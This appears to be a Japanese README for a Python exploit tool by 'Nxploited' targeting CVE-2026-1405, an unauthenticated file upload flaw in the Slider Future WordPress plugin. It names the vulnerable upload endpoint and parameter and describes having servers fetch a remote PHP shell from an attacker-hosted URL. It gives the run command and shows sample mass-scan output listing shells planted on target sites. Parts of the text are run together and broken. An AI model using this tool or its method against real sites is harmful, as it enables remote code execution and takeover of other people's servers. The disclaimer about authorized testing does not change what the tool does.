
Slider Future <= 1.0.5 - 未認証の任意ファイルアップロード
Slider Future <= 1.0.5 - 未認証の任意ファイルアップロード
コンポーネント: Slider Future(WordPress プラグイン)
影響を受けるバージョン: ≤ 1.0.5
脆弱性: 未認証の任意ファイルアップロード
CVE: CVE-2026-1405
CVSS スコア: 9.8(緊急)
WordPress 用プラグイン Slider Future は、1.0.5 までの全バージョンにおいて、slider_future_handle_image_upload 関数のファイルタイプ検証の欠落により、任意のファイルアップロードに対して脆弱です。これにより、未認証の攻撃者が悪意のある PHP シェルを含む任意のファイルタイプを影響を受けるサーバーに直接アップロードでき、リモートコード実行が可能になります。
/wp-json/slider-future/v1/upload-image/image_url パラメータを介してリモート PHP シェルをアップロード(認証不要)。http://example1.com
https://example2.com
...
例:http://yourserver.com/shell.php
python3 CVE-2026-1405.py
次の項目の入力が求められます:
list.txt)Nxploited)success_results.txt に保存されます。/wp-json/slider-future/v1/upload-image/image_urlこのツールは、教育および許可されたセキュリティテストの目的でのみ使用してください。
所有していないサイト、またはテストする明示的な許可を得ていないサイトに対する不正使用は違法です。
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt